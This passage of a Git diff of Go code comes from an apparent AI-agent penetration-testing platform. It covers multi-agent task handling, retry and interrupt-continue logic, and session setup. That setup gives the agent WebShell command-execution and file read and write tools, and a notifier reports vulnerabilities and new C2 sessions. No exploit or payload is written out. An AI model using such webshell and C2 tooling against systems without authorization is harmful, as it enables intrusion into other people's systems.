baseCtx, cancelWithCause = context.WithCancelCause(context.Background()) + taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute) + + if _, err := h.tasks.StartTask(conversationID, req.Message, cancelWithCause); err != nil { + var errorMsg string + if errors.Is(err, ErrTaskAlreadyRunning) { + errorMsg = "⚠️ 当前会话已有任务正在执行中,请等待当前任务完成或点击「停止任务」后再尝试。" + sendEvent("error", errorMsg, map[string]interface{}{ + "conversationId": conversationID, + "errorType": "task_already_running", + }) + } else { + errorMsg = "❌ 无法启动任务: " + err.Error() + sendEvent("error", errorMsg, nil) + } + if assistantMessageID != "" { + _, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errorMsg, time.Now(), assistantMessageID) + } + sendEvent("done", "", map[string]interface{}{"conversationId": conversationID}) + timeoutCancel() + return + } + taskOwned = true + + // 同一 HTTP 流内多段 Run(如中断并继续)合并 MCP execution id,供最终 response / 库表与工具芯片展示完整列表 + var cumulativeMCPExecutionIDs []string + var transientRunAttempts int + var emptyResponseAttempts int + // 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。 + var mainIterationOffset int + + for { + segmentMainIterationMax := 0 + rawProgressCallback := h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent) + progressCallback := func(eventType, message string, data interface{}) { + if eventType == "iteration" { + if m, ok := data.(map[string]interface{}); ok { + if scope, _ := m["einoScope"].(string); scope == "main" { + raw := 0 + switch v := m["iteration"].(type) { + case int: + raw = v + case int32: + raw = int(v) + case int64: + raw = int(v) + case float64: + raw = int(v) + case float32: + raw = int(v) + } + if raw > 0 { + if raw > segmentMainIterationMax { + segmentMainIterationMax = raw + } + m["iteration"] = raw + mainIterationOffset + } + } + } + } + rawProgressCallback(eventType, message, data) + } + taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID) + taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks) + taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) { + return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments) + }) + + result, runErr = multiagent.RunDeepAgent( + taskCtxLoop, + h.config, + &h.config.MultiAgent, + h.agent, + h.logger, + conversationID, + h.conversationProjectID(conversationID), + curFinalMessage, + curHistory, + roleTools, + progressCallback, + h.agentsMarkdownDir, + orch, + chatReasoningToClientIntent(req.Reasoning), + h.projectBlackboardBlock(conversationID), + ) + + if result != nil && len(result.MCPExecutionIDs) > 0 { + cumulativeMCPExecutionIDs = mergeMCPExecutionIDLists(cumulativeMCPExecutionIDs, result.MCPExecutionIDs) + } + + handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue( + baseCtx, conversationID, result, runErr, &emptyResponseAttempts, + &curHistory, &curFinalMessage, segmentUserMessage, progressCallback, + func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) }, + ) + if exhaustedEmpty { + runErr = nil + transientRunAttempts = 0 + timeoutCancel() + break + } + if handledEmpty { + mainIterationOffset += segmentMainIterationMax + transientRunAttempts = 0 + timeoutCancel() + baseCtx, cancelWithCause = context.WithCancelCause(context.Background()) + h.tasks.BindTaskCancel(conversationID, cancelWithCause) + taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute) + h.tasks.UpdateTaskStatus(conversationID, "running") + continue + } + + if runErr == nil { + // 任一段成功完成后,重置临时错误重试窗口(次数/退避从头开始)。 + transientRunAttempts = 0 + emptyResponseAttempts = 0 + timeoutCancel() + break + } + + handled, fatalErr := h.handleEinoTransientRetryContinue( + baseCtx, conversationID, result, runErr, &transientRunAttempts, + &curHistory, &curFinalMessage, segmentUserMessage, progressCallback, + func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) }, + ) + if handled { + mainIterationOffset += segmentMainIterationMax + timeoutCancel() + baseCtx, cancelWithCause = context.WithCancelCause(context.Background()) + h.tasks.BindTaskCancel(conversationID, cancelWithCause) + taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute) + h.tasks.UpdateTaskStatus(conversationID, "running") + continue + } + if fatalErr != nil { + runErr = fatalErr + } + + cause := context.Cause(baseCtx) + if errors.Is(cause, multiagent.ErrInterruptContinue) { + if shouldPersistEinoAgentTraceAfterRunError(baseCtx) { + h.persistEinoAgentTraceForResume(conversationID, result) + } + note := h.tasks.TakeInterruptContinueNote(conversationID) + icSummary := interruptContinueTimelineSummary(note) + progressCallback("user_interrupt_continue", icSummary, map[string]interface{}{ + "conversationId": conversationID, + "rawReason": strings.TrimSpace(note), + "emptyReason": strings.TrimSpace(note) == "", + "kind": "no_active_mcp_tool", + }) + inject := formatInterruptContinueUserMessage(note) + // 不写入 messages 表为 user 气泡:避免主对话流出现大段模板;说明已由 user_interrupt_continue 记入助手 process_details(迭代详情)。 + if hist, err := h.loadHistoryFromAgentTrace(conversationID); err == nil && len(hist) > 0 { + curHistory = hist + } + curFinalMessage = inject + sendEvent("progress", "已合并用户补充与最新轨迹,正在继续推理…", map[string]interface{}{ + "conversationId": conversationID, + "source": "interrupt_continue", + }) + mainIterationOffset += segmentMainIterationMax + // 非临时错误分段续跑(用户中断并继续)时,清空 transient 计数,避免跨分段累加。 + transientRunAttempts = 0 + timeoutCancel() + baseCtx, cancelWithCause = context.WithCancelCause(context.Background()) + h.tasks.BindTaskCancel(conversationID, cancelWithCause) + taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute) + h.tasks.UpdateTaskStatus(conversationID, "running") + continue + } + + if shouldPersistEinoAgentTraceAfterRunError(baseCtx) { + h.persistEinoAgentTraceForResume(conversationID, result) + } + if errors.Is(cause, ErrTaskCancelled) { + taskStatus = "cancelled" + h.tasks.UpdateTaskStatus(conversationID, taskStatus) + cancelMsg := "任务已被用户取消,后续操作已停止。" + if assistantMessageID != "" { + if result != nil { + if err := h.mergeAssistantMessagePartialOnCancel(assistantMessageID, result.Response); err != nil { + h.logger.Warn("合并取消前的部分回复失败", zap.Error(err)) + } + } + if err := h.appendAssistantMessageNotice(assistantMessageID, cancelMsg); err != nil { + h.logger.Warn("更新取消后的助手消息失败", zap.Error(err)) + } + _ = h.db.AddProcessDetail(assistantMessageID, conversationID, "cancelled", cancelMsg, nil) + } + sendEvent("cancelled", cancelMsg, map[string]interface{}{ + "conversationId": conversationID, + "messageId": assistantMessageID, + }) + sendEvent("done", "", map[string]interface{}{"conversationId": conversationID}) + timeoutCancel() + return + } + + if errors.Is(runErr, context.DeadlineExceeded) || errors.Is(context.Cause(taskCtx), context.DeadlineExceeded) { + taskStatus = "timeout" + h.tasks.UpdateTaskStatus(conversationID, taskStatus) + timeoutMsg := "任务执行超时,已自动终止。" + if assistantMessageID != "" { + _, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", timeoutMsg, time.Now(), assistantMessageID) + _ = h.db.AddProcessDetail(assistantMessageID, conversationID, "timeout", timeoutMsg, nil) + } + sendEvent("error", timeoutMsg, map[string]interface{}{ + "conversationId": conversationID, + "messageId": assistantMessageID, + "errorType": "timeout", + }) + sendEvent("done", "", map[string]interface{}{"conversationId": conversationID}) + timeoutCancel() + return + } + + h.logger.Error("Eino DeepAgent 执行失败", zap.Error(runErr)) + taskStatus = "failed" + h.tasks.UpdateTaskStatus(conversationID, taskStatus) + errMsg := "执行失败: " + runErr.Error() + if assistantMessageID != "" { + _, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errMsg, time.Now(), assistantMessageID) + _ = h.db.AddProcessDetail(assistantMessageID, conversationID, "error", errMsg, nil) + } + sendEvent("error", errMsg, map[string]interface{}{ + "conversationId": conversationID, + "messageId": assistantMessageID, + }) + sendEvent("done", "", map[string]interface{}{"conversationId": conversationID}) + timeoutCancel() + return + } + + timeoutCancel() + + if assistantMessageID != "" { + _ = h.db.UpdateAssistantMessageFinalize(assistantMessageID, result.Response, cumulativeMCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput)) + } + + if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" { + if err := h.db.SaveAgentTrace(conversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput); err != nil { + h.logger.Warn("保存代理轨迹失败", zap.Error(err)) + } + } + + effectiveOrch := config.NormalizeMultiAgentOrchestration(h.config.MultiAgent.Orchestration) + if o := strings.TrimSpace(req.Orchestration); o != "" { + effectiveOrch = config.NormalizeMultiAgentOrchestration(o) + } + sendEvent("response", result.Response, map[string]interface{}{ + "mcpExecutionIds": cumulativeMCPExecutionIDs, + "conversationId": conversationID, + "messageId": assistantMessageID, + "agentMode": "eino_" + effectiveOrch, + }) + sendEvent("done", "", map[string]interface{}{"conversationId": conversationID}) +} + +// MultiAgentLoop Eino DeepAgent 非流式对话(需 multi_agent.enabled)。 +func (h *AgentHandler) MultiAgentLoop(c *gin.Context) { + if h.config == nil || !h.config.MultiAgent.Enabled { + c.JSON(http.StatusNotFound, gin.H{"error": "多代理未启用,请在 config.yaml 中设置 multi_agent.enabled: true"}) + return + } + + var req ChatRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + h.logger.Info("收到 Eino DeepAgent 非流式请求", zap.String("conversationId", req.ConversationID)) + + prep, err := h.prepareMultiAgentSession(&req, c, "multi_agent") + if err != nil { + status, msg := multiAgentHTTPErrorStatus(err) + c.JSON(status, gin.H{"error": msg}) + return + } + h.activateHITLForConversation(prep.ConversationID, req.Hitl) + if h.hitlManager != nil { + defer h.hitlManager.DeactivateConversation(prep.ConversationID) + } + + baseCtx, cancelWithCause := context.WithCancelCause(c.Request.Context()) + defer cancelWithCause(nil) + taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute) + defer timeoutCancel() + progressCallback := h.createProgressCallback(taskCtx, cancelWithCause, prep.ConversationID, prep.AssistantMessageID, nil) + taskCtx = multiagent.WithHITLToolInterceptor(taskCtx, func(ctx context.Context, toolName, arguments string) (string, error) { + return h.interceptHITLForEinoTool(ctx, cancelWithCause, prep.ConversationID, prep.AssistantMessageID, nil, toolName, arguments) + }) + + curHist := prep.History + curMsg := prep.FinalMessage + var result *multiagent.RunResult + var runErr error + var transientRunAttempts int + var emptyResponseAttempts int + for { + result, runErr = multiagent.RunDeepAgent( + taskCtx, + h.config, + &h.config.MultiAgent, + h.agent, + h.logger, + prep.ConversationID, + h.conversationProjectID(prep.ConversationID), + curMsg, + curHist, + prep.RoleTools, + progressCallback, + h.agentsMarkdownDir, + strings.TrimSpace(req.Orchestration), + chatReasoningToClientIntent(req.Reasoning), + h.projectBlackboardBlock(prep.ConversationID), + ) + handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue( + baseCtx, prep.ConversationID, result, runErr, &emptyResponseAttempts, + &curHist, &curMsg, prep.FinalMessage, progressCallback, nil, + ) + if exhaustedEmpty { + runErr = nil + break + } + if handledEmpty { + continue + } + if runErr == nil { + break + } + if handled, fatalErr := h.handleEinoTransientRetryContinue( + baseCtx, prep.ConversationID, result, runErr, &transientRunAttempts, + &curHist, &curMsg, prep.FinalMessage, progressCallback, nil, + ); handled { + continue + } else if fatalErr != nil { + runErr = fatalErr + } + if shouldPersistEinoAgentTraceAfterRunError(baseCtx) { + h.persistEinoAgentTraceForResume(prep.ConversationID, result) + } + h.logger.Error("Eino DeepAgent 执行失败", zap.Error(runErr)) + errMsg := "执行失败: " + runErr.Error() + if prep.AssistantMessageID != "" { + _, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errMsg, time.Now(), prep.AssistantMessageID) + } + c.JSON(http.StatusInternalServerError, gin.H{"error": errMsg}) + return + } + + if prep.AssistantMessageID != "" { + _ = h.db.UpdateAssistantMessageFinalize(prep.AssistantMessageID, result.Response, result.MCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput)) + } + + if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" { + if err := h.db.SaveAgentTrace(prep.ConversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput); err != nil { + h.logger.Warn("保存代理轨迹失败", zap.Error(err)) + } + } + + c.JSON(http.StatusOK, ChatResponse{ + Response: result.Response, + MCPExecutionIDs: result.MCPExecutionIDs, + ConversationID: prep.ConversationID, + Time: time.Now(), + }) +} + +// persistEinoAgentTraceForResume 在 Eino 运行异常结束时写入代理轨迹(库列 last_react_*),供下一请求 loadHistoryFromAgentTrace 软续跑。 +func (h *AgentHandler) persistEinoAgentTraceForResume(conversationID string, result *multiagent.RunResult) { + if h == nil || result == nil { + return + } + if result.LastAgentTraceInput == "" && result.LastAgentTraceOutput == "" { + return + } + if err := h.db.SaveAgentTrace(conversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput); err != nil { + h.logger.Warn("保存 Eino 续跑上下文失败", zap.String("conversationId", conversationID), zap.Error(err)) + } +} + +// mergeMCPExecutionIDLists 去重合并多段 Run 的 MCP execution id(顺序:先 dst 后 more)。 +func mergeMCPExecutionIDLists(dst []string, more []string) []string { + seen := make(map[string]struct{}, len(dst)+len(more)) + out := make([]string, 0, len(dst)+len(more)) + add := func(ids []string) { + for _, id := range ids { + id = strings.TrimSpace(id) + if id == "" { + continue + } + if _, ok := seen[id]; ok { + continue + } + seen[id] = struct{}{} + out = append(out, id) + } + } + add(dst) + add(more) + return out +} + +// interruptContinueTimelineSummary 时间线 / process_details 中展示的简短正文(完整模板已写入另一条用户消息)。 +func interruptContinueTimelineSummary(note string) string { + note = strings.TrimSpace(note) + if note == "" { + return "用户选择「中断并继续」,未填写说明;已按默认渗透补充模板合并上下文并续跑。" + } + return "用户中断说明(原文):\n\n" + note +} + +// formatInterruptContinueUserMessage 将「中断并继续」弹窗中的说明格式化为新一轮 user 消息(渗透场景下强调路径补充与端口复扫)。 +func formatInterruptContinueUserMessage(note string) string { + var b strings.Builder + b.WriteString("【用户补充 / 中断后继续】\n") + if s := strings.TrimSpace(note); s != "" { + b.WriteString(s) + b.WriteString("\n\n") + } + b.WriteString("【请在本轮落实】\n") + b.WriteString("- 将用户提供的接口路径、参数、业务变化纳入后续测试与推理。\n") + b.WriteString("- 若资产或目标信息有更新,请对目标重新执行端口/服务探测,再基于新结果规划下一步。\n") + b.WriteString("- 在已有轨迹基础上推进,避免无意义重复已完成的步骤。\n") + return strings.TrimSpace(b.String()) +} + +func multiAgentHTTPErrorStatus(err error) (int, string) { + msg := err.Error() + switch { + case strings.Contains(msg, "对话不存在"): + return http.StatusNotFound, msg + case strings.Contains(msg, "未找到该 WebShell"): + return http.StatusBadRequest, msg + case strings.Contains(msg, "附件最多"): + return http.StatusBadRequest, msg + case strings.Contains(msg, "保存用户消息失败"), strings.Contains(msg, "创建对话失败"): + return http.StatusInternalServerError, msg + case strings.Contains(msg, "保存上传文件失败"): + return http.StatusInternalServerError, msg + default: + return http.StatusBadRequest, msg + } +} diff --git a/internal/handler/multi_agent_prepare.go b/internal/handler/multi_agent_prepare.go new file mode 100644 index 00000000..8f45919d --- /dev/null +++ b/internal/handler/multi_agent_prepare.go @@ -0,0 +1,152 @@ +package handler + +import ( + "fmt" + "strings" + + "cyberstrike-ai/internal/agent" + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/mcp/builtin" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +// multiAgentPrepared 多代理请求在调用 Eino 前的会话与消息准备结果。 +type multiAgentPrepared struct { + ConversationID string + CreatedNew bool + History []agent.ChatMessage + FinalMessage string + RoleTools []string + AssistantMessageID string + UserMessageID string +} + +func (h *AgentHandler) prepareMultiAgentSession(req *ChatRequest, c *gin.Context, source string) (*multiAgentPrepared, error) { + if len(req.Attachments) > maxAttachments { + return nil, fmt.Errorf("附件最多 %d 个", maxAttachments) + } + + conversationID := strings.TrimSpace(req.ConversationID) + createdNew := false + if conversationID == "" { + title := safeTruncateString(req.Message, 50) + var conv *database.Conversation + var err error + meta := audit.ConversationCreateMetaFromGin(c, source) + meta.ProjectID = effectiveProjectID(h.config, req.ProjectID) + if strings.TrimSpace(req.WebShellConnectionID) != "" { + meta.Source = source + "_webshell" + meta.WebShellConnectionID = strings.TrimSpace(req.WebShellConnectionID) + conv, err = h.db.CreateConversationWithWebshell(meta.WebShellConnectionID, title, meta) + } else { + conv, err = h.db.CreateConversation(title, meta) + } + if err != nil { + return nil, fmt.Errorf("创建对话失败: %w", err) + } + conversationID = conv.ID + createdNew = true + } else { + if _, err := h.db.GetConversation(conversationID); err != nil { + return nil, fmt.Errorf("对话不存在") + } + } + + agentHistoryMessages, err := h.loadHistoryFromAgentTrace(conversationID) + if err != nil { + historyMessages, getErr := h.db.GetMessages(conversationID) + if getErr != nil { + agentHistoryMessages = []agent.ChatMessage{} + } else { + agentHistoryMessages = dbMessagesToAgentChatMessages(historyMessages) + } + } + + finalMessage := req.Message + var roleTools []string + if req.WebShellConnectionID != "" { + conn, errConn := h.db.GetWebshellConnection(strings.TrimSpace(req.WebShellConnectionID)) + if errConn != nil || conn == nil { + h.logger.Warn("WebShell AI 助手:未找到连接", zap.String("id", req.WebShellConnectionID), zap.Error(errConn)) + return nil, fmt.Errorf("未找到该 WebShell 连接") + } + webshellContext := BuildWebshellAssistantContext(conn, WebshellSkillHintMultiAgent, req.Message) + // WebShell 模式下如果同时指定了角色,追加角色 user_prompt(工具集仍仅限 webshell 专用工具) + if req.Role != "" && req.Role != "默认" && h.config != nil && h.config.Roles != nil { + if role, exists := h.config.Roles[req.Role]; exists && role.Enabled && role.UserPrompt != "" { + finalMessage = role.UserPrompt + "\n\n" + webshellContext + h.logger.Info("WebShell + 角色: 应用角色提示词(多代理)", zap.String("role", req.Role)) + } else { + finalMessage = webshellContext + } + } else { + finalMessage = webshellContext + } + roleTools = []string{ + builtin.ToolWebshellExec, + builtin.ToolWebshellFileList, + builtin.ToolWebshellFileRead, + builtin.ToolWebshellFileWrite, + builtin.ToolRecordVulnerability, + builtin.ToolListVulnerabilities, + builtin.ToolGetVulnerability, + builtin.ToolUpsertProjectFact, + builtin.ToolGetProjectFact, + builtin.ToolListProjectFacts, + builtin.ToolSearchProjectFacts, + builtin.ToolDeprecateProjectFact, + builtin.ToolRestoreProjectFact, + builtin.ToolListKnowledgeRiskTypes, + builtin.ToolSearchKnowledgeBase, + } + } else if req.Role != "" && req.Role != "默认" && h.config != nil && h.config.Roles != nil { + if role, exists := h.config.Roles[req.Role]; exists && role.Enabled { + if role.UserPrompt != "" { + finalMessage = role.UserPrompt + "\n\n" + req.Message + } + roleTools = role.Tools + } + } + + var savedPaths []string + if len(req.Attachments) > 0 { + var aerr error + savedPaths, aerr = saveAttachmentsToDateAndConversationDir(req.Attachments, conversationID, h.logger) + if aerr != nil { + return nil, fmt.Errorf("保存上传文件失败: %w", aerr) + } + } + finalMessage = appendAttachmentsToMessage(finalMessage, req.Attachments, savedPaths) + + userContent := userMessageContentForStorage(req.Message, req.Attachments, savedPaths) + userMsgRow, uerr := h.db.AddMessage(conversationID, "user", userContent, nil) + if uerr != nil { + h.logger.Error("保存用户消息失败", zap.Error(uerr)) + return nil, fmt.Errorf("保存用户消息失败: %w", uerr) + } + userMessageID := "" + if userMsgRow != nil { + userMessageID = userMsgRow.ID + } + + assistantMsg, aerr := h.db.AddMessage(conversationID, "assistant", "处理中...", nil) + var assistantMessageID string + if aerr != nil { + h.logger.Warn("创建助手消息占位失败", zap.Error(aerr)) + } else if assistantMsg != nil { + assistantMessageID = assistantMsg.ID + } + + return &multiAgentPrepared{ + ConversationID: conversationID, + CreatedNew: createdNew, + History: agentHistoryMessages, + FinalMessage: finalMessage, + RoleTools: roleTools, + AssistantMessageID: assistantMessageID, + UserMessageID: userMessageID, + }, nil +} diff --git a/internal/handler/notification.go b/internal/handler/notification.go new file mode 100644 index 00000000..8871e944 --- /dev/null +++ b/internal/handler/notification.go @@ -0,0 +1,699 @@ +package handler + +import ( + "fmt" + "net/http" + "sort" + "strconv" + "strings" + "time" + + "cyberstrike-ai/internal/database" + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +// NotificationHandler 聚合通知(Phase 2:服务端统一计算) +type NotificationHandler struct { + db *database.DB + agentHandler *AgentHandler + logger *zap.Logger +} + +const notificationReadMaxRows = 150 + +// NotificationSummaryItem 通知项 +type NotificationSummaryItem struct { + ID string `json:"id"` + Level string `json:"level"` // p0/p1/p2 + Type string `json:"type"` + Title string `json:"title"` + Desc string `json:"desc"` + Ts string `json:"ts"` // RFC3339 + Count int `json:"count,omitempty"` + Actionable bool `json:"actionable"` + Read bool `json:"read"` + // 以下字段用于前端深链跳转(通知即入口) + ConversationID string `json:"conversationId,omitempty"` + VulnerabilityID string `json:"vulnerabilityId,omitempty"` + ExecutionID string `json:"executionId,omitempty"` + InterruptID string `json:"interruptId,omitempty"` + SessionID string `json:"sessionId,omitempty"` // C2 会话(如新会话上线) +} + +// NotificationSummaryResponse 聚合响应 +type NotificationSummaryResponse struct { + SinceMs int64 `json:"sinceMs"` + GeneratedAt string `json:"generatedAt"` + P0Count int `json:"p0Count"` + UnreadCount int `json:"unreadCount"` + Counts map[string]int `json:"counts"` + Items []NotificationSummaryItem `json:"items"` +} + +func NewNotificationHandler(db *database.DB, agentHandler *AgentHandler, logger *zap.Logger) *NotificationHandler { + return &NotificationHandler{ + db: db, + agentHandler: agentHandler, + logger: logger, + } +} + +func parseSinceMs(raw string) int64 { + v := strings.TrimSpace(raw) + if v == "" { + return 0 + } + if ms, err := strconv.ParseInt(v, 10, 64); err == nil && ms > 0 { + return ms + } + if t, err := time.Parse(time.RFC3339, v); err == nil { + return t.UnixMilli() + } + return 0 +} + +func unixSecToRFC3339(sec int64) string { + if sec <= 0 { + return time.Now().UTC().Format(time.RFC3339) + } + return time.Unix(sec, 0).UTC().Format(time.RFC3339) +} + +func normalizedSinceSec(sinceMs int64) int64 { + sec := sinceMs / 1000 + // SQLite 默认时间精度到秒;给 1s 回看窗口,避免“同秒内新增”被漏算。 + if sec > 0 { + return sec - 1 + } + return 0 +} + +func normalizeSinceMs(raw int64) int64 { + if raw > 0 { + return raw + } + // 默认仅看最近 24 小时,避免首次打开拉全量历史噪音。 + return time.Now().Add(-24 * time.Hour).UnixMilli() +} + +func levelBySeverity(sev string) string { + switch strings.ToLower(strings.TrimSpace(sev)) { + case "critical", "high": + return "p0" + case "medium": + return "p1" + default: + return "p2" + } +} + +func requestWantsEnglish(c *gin.Context) bool { + if c == nil { + return false + } + lang := strings.ToLower(strings.TrimSpace(c.Query("lang"))) + if lang == "" { + lang = strings.ToLower(strings.TrimSpace(c.GetHeader("Accept-Language"))) + } + return strings.HasPrefix(lang, "en") +} + +func i18nText(english bool, zh string, en string) string { + if english { + return en + } + return zh +} + +func (h *NotificationHandler) loadPendingHITLItems(limit int, english bool) ([]NotificationSummaryItem, error) { + rows, err := h.db.Query(` + SELECT + id, + conversation_id, + tool_name, + COALESCE(CAST(strftime('%s', created_at) AS INTEGER), 0) + FROM hitl_interrupts + WHERE status = 'pending' + ORDER BY created_at DESC + LIMIT ? + `, limit) + if err != nil { + return nil, err + } + defer rows.Close() + items := make([]NotificationSummaryItem, 0, limit) + for rows.Next() { + var id, conversationID, toolName string + var createdSec int64 + if err := rows.Scan(&id, &conversationID, &toolName, &createdSec); err != nil { + continue + } + desc := i18nText(english, "会话 "+conversationID+" 的审批中断待处理", "Conversation "+conversationID+" has pending HITL approval") + if strings.TrimSpace(toolName) != "" { + desc = i18nText(english, "工具 "+toolName+" 等待审批", "Tool "+toolName+" is waiting for approval") + } + items = append(items, NotificationSummaryItem{ + ID: "hitl:" + id, + Level: "p0", + Type: "hitl_pending", + Title: i18nText(english, "HITL 待审批", "HITL Pending Approval"), + Desc: desc, + Ts: unixSecToRFC3339(createdSec), + Count: 1, + Actionable: true, + Read: false, + ConversationID: conversationID, + InterruptID: id, + }) + } + return items, nil +} + +func (h *NotificationHandler) loadVulnerabilityItems(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, map[string]int, error) { + sinceSec := normalizedSinceSec(sinceMs) + rows, err := h.db.Query(` + SELECT + id, + title, + severity, + conversation_id, + COALESCE(CAST(strftime('%s', created_at) AS INTEGER), 0) + FROM vulnerabilities + WHERE CAST(strftime('%s', created_at) AS INTEGER) > ? + ORDER BY created_at DESC + LIMIT ? + `, sinceSec, limit) + if err != nil { + return nil, nil, err + } + defer rows.Close() + items := make([]NotificationSummaryItem, 0, limit) + counts := map[string]int{ + "newCriticalVulns": 0, + "newHighVulns": 0, + "newMediumVulns": 0, + "newLowVulns": 0, + "newInfoVulns": 0, + } + for rows.Next() { + var id, title, severity, conversationID string + var createdSec int64 + if err := rows.Scan(&id, &title, &severity, &conversationID, &createdSec); err != nil { + continue + } + switch strings.ToLower(strings.TrimSpace(severity)) { + case "critical": + counts["newCriticalVulns"]++ + case "high": + counts["newHighVulns"]++ + case "medium": + counts["newMediumVulns"]++ + case "low": + counts["newLowVulns"]++ + default: + counts["newInfoVulns"]++ + } + sevUpper := strings.ToUpper(strings.TrimSpace(severity)) + if sevUpper == "" { + sevUpper = "INFO" + } + finalTitle := i18nText(english, "新漏洞("+sevUpper+")", "New Vulnerability ("+sevUpper+")") + finalDesc := strings.TrimSpace(title) + if finalDesc == "" { + finalDesc = i18nText(english, "(无标题)", "(Untitled)") + } + items = append(items, NotificationSummaryItem{ + ID: "vuln:" + id, + Level: levelBySeverity(severity), + Type: "vulnerability_created", + Title: finalTitle, + Desc: finalDesc, + Ts: unixSecToRFC3339(createdSec), + Count: 1, + Actionable: false, + Read: false, + ConversationID: conversationID, + VulnerabilityID: id, + }) + } + return items, counts, nil +} + +// loadC2SessionOnlineEvents 新会话上线(c2_events:session + critical,与 Manager.IngestCheckIn 一致) +func (h *NotificationHandler) loadC2SessionOnlineEvents(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, int, error) { + sinceSec := normalizedSinceSec(sinceMs) + rows, err := h.db.Query(` + SELECT id, message, COALESCE(session_id, ''), + COALESCE(CAST(strftime('%s', created_at) AS INTEGER), 0) + FROM c2_events + WHERE category = 'session' AND level = 'critical' + AND CAST(strftime('%s', created_at) AS INTEGER) > ? + ORDER BY created_at DESC + LIMIT ? + `, sinceSec, limit) + if err != nil { + return nil, 0, err + } + defer rows.Close() + items := make([]NotificationSummaryItem, 0, limit) + for rows.Next() { + var id, message, sessionID string + var createdSec int64 + if err := rows.Scan(&id, &message, &sessionID, &createdSec); err != nil { + continue + } + desc := strings.TrimSpace(message) + if len(desc) > 220 { + desc = desc[:200] + "…" + } + if desc == "" { + desc = i18nText(english, "新会话已建立", "A new session was created") + } + items = append(items, NotificationSummaryItem{ + ID: "c2evt:" + id, + Level: "p0", + Type: "c2_session_online", + Title: i18nText(english, "C2 新会话上线", "C2 new session online"), + Desc: desc, + Ts: unixSecToRFC3339(createdSec), + Count: 1, + Actionable: false, + Read: false, + SessionID: sessionID, + }) + } + return items, len(items), rows.Err() +} + +func (h *NotificationHandler) loadFailedExecutionItems(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, int, error) { + sinceSec := normalizedSinceSec(sinceMs) + rows, err := h.db.Query(` + SELECT + id, + tool_name, + COALESCE(CAST(strftime('%s', start_time) AS INTEGER), 0) + FROM tool_executions + WHERE status = 'failed' + AND CAST(strftime('%s', start_time) AS INTEGER) > ? + ORDER BY start_time DESC + LIMIT ? + `, sinceSec, limit) + if err != nil { + return nil, 0, err + } + defer rows.Close() + items := make([]NotificationSummaryItem, 0, limit) + count := 0 + for rows.Next() { + var id, toolName string + var startSec int64 + if err := rows.Scan(&id, &toolName, &startSec); err != nil { + continue + } + count++ + if strings.TrimSpace(toolName) == "" { + toolName = i18nText(english, "未知工具", "unknown") + } + items = append(items, NotificationSummaryItem{ + ID: "exec_failed:" + id, + Level: "p0", + Type: "task_failed", + Title: i18nText(english, "任务执行失败", "Task Execution Failed"), + Desc: i18nText(english, "工具 "+toolName+" 执行失败", "Tool "+toolName+" execution failed"), + Ts: unixSecToRFC3339(startSec), + Count: 1, + Actionable: false, + Read: false, + ExecutionID: id, + }) + } + return items, count, nil +} + +func (h *NotificationHandler) summarizeLongRunningTasks(threshold time.Duration, english bool) ([]NotificationSummaryItem, int) { + if h.agentHandler == nil || h.agentHandler.tasks == nil { + return nil, 0 + } + tasks := h.agentHandler.tasks.GetActiveTasks() + now := time.Now() + items := make([]NotificationSummaryItem, 0, len(tasks)) + for _, t := range tasks { + if t == nil { + continue + } + if now.Sub(t.StartedAt) >= threshold { + items = append(items, NotificationSummaryItem{ + ID: "task_long:" + t.ConversationID, + Level: "p1", + Type: "long_running_tasks", + Title: i18nText(english, "长时间运行任务", "Long Running Task"), + Desc: i18nText(english, "会话 "+t.ConversationID+" 运行超过 15 分钟", "Conversation "+t.ConversationID+" has been running over 15 minutes"), + Ts: t.StartedAt.UTC().Format(time.RFC3339), + Count: 1, + Actionable: true, + Read: false, + ConversationID: t.ConversationID, + }) + } + } + return items, len(items) +} + +func (h *NotificationHandler) summarizeCompletedTasksSince(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, int) { + if h.agentHandler == nil || h.agentHandler.tasks == nil { + return nil, 0 + } + since := time.UnixMilli(sinceMs) + completed := h.agentHandler.tasks.GetCompletedTasks() + items := make([]NotificationSummaryItem, 0, limit) + for _, t := range completed { + if t == nil { + continue + } + if t.CompletedAt.After(since) { + items = append(items, NotificationSummaryItem{ + ID: "task_completed:" + t.ConversationID + ":" + 